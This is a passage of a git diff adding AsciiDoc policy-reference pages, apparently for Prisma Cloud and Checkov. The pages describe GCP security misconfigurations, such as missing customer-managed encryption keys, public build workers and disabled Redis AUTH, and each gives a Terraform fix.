supplied*. + +. In the dialog box, enter the *Key*. + +. Select *Wrapped key*. + +. Click *Create*. 
+ + +*CLI Command* + + +In the gcloud compute tool, to encrypt a disk, use the `--csek-key-file` flag during instance creation. +If you are using an RSA-wrapped key, use the gcloud beta component and the following command: `gcloud (beta) compute instances create INSTANCE_NAME --csek-key-file <example-file.json>` +To encrypt a standalone persistent disk, use the following command: `gcloud (beta) compute disks create DISK_NAME --csek-key-file <examplefile.json>` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_disk +* *Field:* disk_encryption_key +* *Resource:* google_compute_instance +* *Arguments:* boot_disk:disk_encryption_key_raw + + +[source,go] +---- +//Option 1 +resource "google_compute_disk" "default" { + name = "test-disk" + type = "pd-ssd" + zone = "us-central1-a" + image = "debian-8-jessie-v20170523" + physical_block_size_bytes = 4096 + // Provide exactly one of raw_key or kms_key_self_link (values elided) + disk_encryption_key { + raw_key = + kms_key_self_link = + } +} + +//Option 2 +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk { + disk_encryption_key_raw = + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc new file mode 100644 index 000000000..2211a3aa0 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc @@ -0,0 +1,67 @@ +== GCP Artifact Registry repositories are not encrypted with Customer Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] 
+|=== +|Prisma Cloud Policy ID +| ce1a6762-478b-48c6-b01c-f5a1479512c6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py[CKV_GCP_84] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Artifact Registry repositories. +This helps protect the Google-generated keys used to encrypt and decrypt your data. 
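+ +The Buildtime fix references an existing KMS key via `google_kms_crypto_key.example.name`. A minimal sketch of the assumed key ring and key, with illustrative names and location: + +[source,go] +---- +resource "google_kms_key_ring" "keyring" { + name = "example-keyring" + location = "us-central1" +} + +resource "google_kms_crypto_key" "example" { + name = "example-key" + key_ring = google_kms_key_ring.keyring.id + // 90-day rotation, consistent with CKV_GCP_43 + rotation_period = "7776000s" +} +----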
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_artifact_registry_repository +* *Arguments:* kms_key_name + + +[source,go] +---- +resource "google_artifact_registry_repository" "pass" { + provider = google-beta + + location = "us-central1" + repository_id = "my-repository" + description = "example docker repository with cmek" + format = "DOCKER" + kms_key_name = google_kms_crypto_key.example.name +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc new file mode 100644 index 000000000..75055ae94 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc @@ -0,0 +1,63 @@ +== GCP Big Query Datasets are not encrypted with Customer Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0993e534-88c1-40c2-913b-0d10c8806c52 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py[CKV_GCP_81] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage that is available for Big Query Datasets. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. 
+We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Big Query Datasets. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "google_bigquery_dataset" "pass" { + dataset_id = var.dataset.dataset_id + friendly_name = var.dataset.friendly_name + description = var.dataset.description + location = var.location + default_table_expiration_ms = var.dataset.default_table_expiration_ms + + default_encryption_configuration { + kms_key_name = google_kms_crypto_key.example.name + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc new file mode 100644 index 000000000..b7de1a7e4 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc @@ -0,0 +1,82 @@ +== GCP Big Query Tables are not encrypted with Customer Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a87cc89c-014f-43c0-9e4c-b77776ed96d4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py[CKV_GCP_80] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. 
+Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Big Query Tables. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_bigquery_table +* *Arguments:* encryption_configuration.kms_key_name + + +[source,go] +---- +resource "google_bigquery_table" "pass" { + dataset_id = google_bigquery_dataset.default.dataset_id + table_id = "sheet" + + external_data_configuration { + autodetect = true + source_format = "GOOGLE_SHEETS" + + google_sheets_options { + skip_leading_rows = 1 + } + + source_uris = [ + "https://docs.google.com/spreadsheets/d/123456789012345", + ] + } + + encryption_configuration { + kms_key_name = var.kms_key_name + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc new file mode 100644 index 000000000..a8fb911a1 --- /dev/null +++ 
b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc @@ -0,0 +1,73 @@ +== GCP Big Table Instances are not encrypted with Customer Supplied Encryption Keys (CSEKs) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8e588018-92ea-40f2-a5fe-ad8ccc030b65 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py[CKV_GCP_85] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Big Table Instances. +This helps protect the Google-generated keys used to encrypt and decrypt your data. 
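+ +Before a CMEK-protected instance can be created, the Bigtable service agent typically needs permission to use the key. A hedged sketch, assuming the key resource from the fix below and an illustrative project number in the service agent address: + +[source,go] +---- +resource "google_kms_crypto_key_iam_member" "bigtable" { + crypto_key_id = google_kms_crypto_key.example.id + role = "roles/cloudkms.cryptoKeyEncrypterDecrypter" + // Replace 123456789 with your project number + member = "serviceAccount:service-123456789@gcp-sa-bigtable.iam.gserviceaccount.com" +} +----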
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_bigtable_instance
+* *Arguments:* cluster.kms_key_name
+
+
+[source,go]
+----
+resource "google_bigtable_instance" "pass" {
+  name = "tf-instance"
+
+  cluster {
+    cluster_id   = "tf-instance-cluster"
+    num_nodes    = 1
+    storage_type = "HDD"
+    kms_key_name = google_kms_crypto_key.example.name
+  }
+
+  labels = {
+    my-label = "prod-label"
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-build-workers-are-private.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-build-workers-are-private.adoc
new file mode 100644
index 000000000..bdf9eb9d4
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-build-workers-are-private.adoc
@@ -0,0 +1,62 @@
+== GCP cloud build workers are not private
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 954e7d8e-bbb5-427f-a43b-266552d37b56
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py[CKV_GCP_86]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Google Cloud Build is a fully managed continuous integration and delivery platform that allows developers to build, test, and deploy applications on Google Cloud Platform.
+When you create a build using Cloud Build, the service automatically provisions a build worker to execute the build.
+Build workers are virtual machines that are used to run the build steps defined in your build configuration.
+They are responsible for executing the commands specified in your build configuration, such as building a Docker image, running tests, or deploying an application.
+Build workers can be either public or private.
+Public build workers have internet access and can access external resources or services, while private build workers do not have internet access and are isolated from external networks.
+You can choose which type of worker to use based on your build requirements and the level of security and isolation you need.
+We recommend you make your Cloud Build workers private.
+By isolating your build workers from the internet, you can reduce the risk of external threats such as hackers or malware infiltrating your build environment.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_cloudbuild_worker_pool" "pass" {
+  name     = "my-pool"
+  location = "europe-west1"
+
+  worker_config {
+    disk_size_gb   = 100
+    machine_type   = "e2-standard-4"
+    no_external_ip = true
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-storage-has-versioning-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-storage-has-versioning-enabled.adoc
new file mode 100644
index 000000000..ca572f9d6
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-storage-has-versioning-enabled.adoc
@@ -0,0 +1,50 @@
+== GCP Cloud storage does not have versioning enabled
+
+Enabling versioning for your Google Cloud Platform (GCP) Cloud Storage can help improve the security and management of your data.
+Versioning allows you to keep multiple versions of an object in your storage bucket, and can be useful for a variety of purposes.
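+As a minimal sketch of how versioning is typically paired with a lifecycle rule so that recoverability does not come with unbounded storage growth (the bucket name and retention count below are illustrative, not part of the policy):
+
+[source,go]
+----
+resource "google_storage_bucket" "versioned" {
+  name     = "example-versioned-bucket"
+  location = "EU"
+
+  # Keep noncurrent object versions so accidental deletes or
+  # overwrites can be recovered.
+  versioning {
+    enabled = true
+  }
+
+  # Optionally prune history: delete a version once three newer
+  # versions of the same object exist.
+  lifecycle_rule {
+    condition {
+      num_newer_versions = 3
+    }
+    action {
+      type = "Delete"
+    }
+  }
+}
+----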
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 5891ec5e-06a3-4aed-acc7-f23548b8dd5e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py[CKV_GCP_78]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_storage_bucket" "pass" {
+  name     = "foo"
+  location = "EU"
+
+  versioning {
+    enabled = true
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc
new file mode 100644
index 000000000..c1f23d318
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc
@@ -0,0 +1,69 @@
+== GCP data flow jobs are not encrypted with Customer Supplied Encryption Keys (CSEK)
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 16e69d18-0a3c-4049-9c9c-a1f0d1bc7212
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py[CKV_GCP_90]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine.
+Google Compute Engine encrypts all data at rest by default.
+Compute Engine handles and manages this encryption automatically, with no additional action required.
+When you provide your own encryption keys, Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data.
+Only users that provide the correct key can use resources protected by a customer-supplied encryption key.
+Google does not store your keys on its servers and cannot access your protected data unless you provide the key.
+If you forget or lose your key, Google is unable to recover the key or to recover any data encrypted with that key.
+To control and manage this encryption yourself, you must provide your own encryption keys.
+We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business-critical Dataflow jobs.
+This helps protect the Google-generated keys used to encrypt and decrypt your data.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_dataflow_job
+* *Arguments:* kms_key_name
+
+
+[source,go]
+----
+resource "google_dataflow_job" "pass" {
+  name              = "dataflow-job"
+  template_gcs_path = "gs://my-bucket/templates/template_file"
+  temp_gcs_location = "gs://my-bucket/tmp_dir"
+
+  parameters = {
+    foo = "bar"
+    baz = "qux"
+  }
+
+  kms_key_name = "SecretSquirrel"
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-fusion-instances-are-private.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-fusion-instances-are-private.adoc
new file mode 100644
index 000000000..b38b4fae6
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-fusion-instances-are-private.adoc
@@ -0,0 +1,71 @@
+== GCP data fusion instances are not private
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| dad1746b-73ac-45c8-bf9f-17531937dbd1
+
+|Checkov Check ID
+| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py[CKV_GCP_87]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+GCP Data Fusion is a fully managed, cloud-native data integration service that helps users build and manage ETL (extract, transform, and load) pipelines.
+It is designed to simplify and accelerate the process of building and maintaining data pipelines, allowing users to create data pipelines that can ingest data from a variety of sources, transform and cleanse the data, and then load the data into a destination of their choice.
+A Data Fusion instance is a logical container that is used to host and run data pipelines.
+It is created within a Google Cloud project, and users can create multiple instances within a single project.
+Each instance has its own resources and configuration settings, allowing users to tailor the instance to their specific needs.
+We recommend you remove the public IPs for your Data Fusion instance.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_data_fusion_instance" "pass" {
+  provider                      = google-beta
+  name                          = "my-instance"
+  description                   = "My Data Fusion instance"
+  region                        = "us-central1"
+  type                          = "BASIC"
+  enable_stackdriver_logging    = true
+  enable_stackdriver_monitoring = true
+
+  labels = {
+    example_key = "example_value"
+  }
+
+  private_instance = true
+
+  network_config {
+    network       = "default"
+    ip_allocation = "10.89.48.0/22"
+  }
+
+  version                  = "6.3.0"
+  dataproc_service_account = data.google_app_engine_default_service_account.default.email
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc
new file mode 100644
index 000000000..781a2c256
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc
@@ -0,0 +1,65 @@
+== GCP DataFusion does not have stack driver logging enabled
+
+It is recommended to enable Stackdriver logging for GCP DataFusion in order to track configuration changes made manually and programmatically, and to trace back unapproved changes.
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 619ea932-56a1-499f-8e54-be6f7aa2e96e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py[CKV_GCP_104]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_data_fusion_instance" "pass" {
+  project                       = "examplea"
+  provider                      = google-beta
+  name                          = "my-instance"
+  description                   = "My Data Fusion instance"
+  region                        = "us-central1"
+  type                          = "BASIC"
+  enable_stackdriver_logging    = true
+  enable_stackdriver_monitoring = true
+
+  labels = {
+    example_key = "example_value"
+  }
+
+  network_config {
+    network       = "default"
+    ip_allocation = "10.89.48.0/22"
+  }
+
+  version                  = "6.3.0"
+  dataproc_service_account = data.google_app_engine_default_service_account.default.email
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc
new file mode 100644
index 000000000..2fd37054c
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc
@@ -0,0 +1,64 @@
+== GCP DataFusion does not have stack driver monitoring enabled
+
+Enabling Stackdriver monitoring for your Google Cloud Platform (GCP) DataFusion instance can help improve the security and management of your data.
+Stackdriver is a monitoring and logging service that allows you to track the performance and health of your GCP resources.
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d207319b-a2d3-4896-8cdd-a7d4efbb7c1d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py[CKV_GCP_105]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_data_fusion_instance" "pass" {
+  project                       = "examplea"
+  provider                      = google-beta
+  name                          = "my-instance"
+  description                   = "My Data Fusion instance"
+  region                        = "us-central1"
+  type                          = "BASIC"
+  enable_stackdriver_logging    = true
+  enable_stackdriver_monitoring = true
+
+  labels = {
+    example_key = "example_value"
+  }
+
+  network_config {
+    network       = "default"
+    ip_allocation = "10.89.48.0/22"
+  }
+
+  version                  = "6.3.0"
+  dataproc_service_account = data.google_app_engine_default_service_account.default.email
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc
new file mode 100644
index 000000000..98986a996
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc
@@ -0,0 +1,68 @@
+== GCP Dataproc cluster is not encrypted with Customer Supplied Encryption Keys (CSEKs)
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 398aa1d3-0edd-4cf3-b2c3-b861a27be225
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py[CKV_GCP_91]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine.
+Google Compute Engine encrypts all data at rest by default.
+Compute Engine handles and manages this encryption automatically, with no additional action required.
+When you provide your own encryption keys, Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data.
+Only users that provide the correct key can use resources protected by a customer-supplied encryption key.
+Google does not store your keys on its servers and cannot access your protected data unless you provide the key.
+If you forget or lose your key, Google is unable to recover the key or to recover any data encrypted with that key.
+To control and manage this encryption yourself, you must provide your own encryption keys.
+We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business-critical Dataproc clusters.
+This helps protect the Google-generated keys used to encrypt and decrypt your data.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_dataproc_cluster
+* *Arguments:* cluster_config.encryption_config.kms_key_name
+
+
+[source,go]
+----
+resource "google_dataproc_cluster" "pass" {
+  name   = "simplecluster"
+  region = "us-central1"
+
+  cluster_config {
+    encryption_config {
+      kms_key_name = "SecretSquirrel"
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-kms-keys-are-protected-from-deletion.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-kms-keys-are-protected-from-deletion.adoc
new file mode 100644
index 000000000..6788e47b8
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-kms-keys-are-protected-from-deletion.adoc
@@ -0,0 +1,56 @@
+== GCP KMS keys are not protected from deletion
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| db3149cb-de18-4818-b917-ead102d871b4
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py[CKV_GCP_82]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Protecting your Google Cloud Platform (GCP) KMS keys from deletion can help ensure the security and integrity of your keys.
+KMS keys are used to encrypt and decrypt data, and deleting them can cause data loss and disrupt the operation of your systems.
+By protecting your KMS keys from deletion, you can help prevent accidental or unauthorized deletion of your keys.
+This can help ensure that your keys are always available when needed, and can help protect your data from potential security threats such as data breaches or unauthorized access.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_kms_crypto_key" "pass" {
+  name            = "crypto-key-example"
+  key_ring        = google_kms_key_ring.keyring.id
+  rotation_period = "15552000s"
+
+  lifecycle {
+    prevent_destroy = true
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc
new file mode 100644
index 000000000..1f313f331
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc
@@ -0,0 +1,102 @@
+== GCP Memorystore for Redis has AUTH disabled
+
+//*Memorystore for Redis has AUTH disabled*
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b485b8a5-1a76-42d3-ba14-aa51e9bc5700
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py[CKV_GCP_95]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+https://cloud.google.com/memorystore/docs/redis/auth-overview[AUTH] is an optional security feature on Memorystore for Redis that requires incoming connections to authenticate with an AUTH string.
+Every AUTH string is a Universally Unique Identifier (UUID), and each Redis instance with AUTH enabled has a unique AUTH string.
+When you enable the AUTH feature on your Memorystore instance, incoming client connections must authenticate in order to connect.
+Once a client authenticates with an AUTH string, it remains authenticated for the lifetime of that connection, even if you change the AUTH string.
+We recommend that you enable AUTH on your Memorystore for Redis database to protect against unwanted or non-approved connections.
+
+////
+=== Fix - Runtime
+
+
+*GCP Console*
+
+
+To enable *AUTH* on your Memorystore for Redis database:
+
+. Log in to the GCP Console at https://console.cloud.google.com.
+
+. Navigate to https://console.cloud.google.com/memorystore/redis/instances[Memorystore for Redis].
+
+. View your instance's _Instance details_ page by clicking on your *Instance ID*.
+
+. Select the *EDIT* button.
+
+. Scroll to the _Security_ section and select the checkbox for *Enable AUTH*.
+
+
+*CLI Command*
+
+
+To enable *AUTH* on your Memorystore for Redis instance, execute the following command:
+
+
+[source,shell]
+----
+gcloud beta redis instances update INSTANCE-ID \
+    --enable-auth \
+    --region=REGION
+----
+
+Replace *INSTANCE-ID* with your Memorystore for Redis instance ID.
+Replace *REGION* with the region where your Memorystore for Redis database lives.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_redis_instance
+* *Field:* auth_enabled
+
+
+[source,go]
+----
+resource "google_redis_instance" "cache" {
+  name           = "memory-cache"
+  display_name   = "memory cache db"
+  tier           = "STANDARD_HA"
+  memory_size_gb = 1
+
+- auth_enabled = false
++ auth_enabled = true
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc
new file mode 100644
index 000000000..ffb0f719d
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc
@@ -0,0 +1,72 @@
+== GCP Memorystore for Redis does not use intransit encryption
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 31eb817a-15ca-4bfa-a92b-0afa481eb4de
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py[CKV_GCP_97]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies GCP Memorystore for Redis instances that are configured with in-transit data encryption disabled.
+It is recommended that these resources be configured with in-transit data encryption to minimize the risk of sensitive data being leaked.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_redis_instance" "pass" {
+  provider       = google-beta
+  name           = "mrr-memory-cache"
+  tier           = "STANDARD_HA"
+  memory_size_gb = 5
+
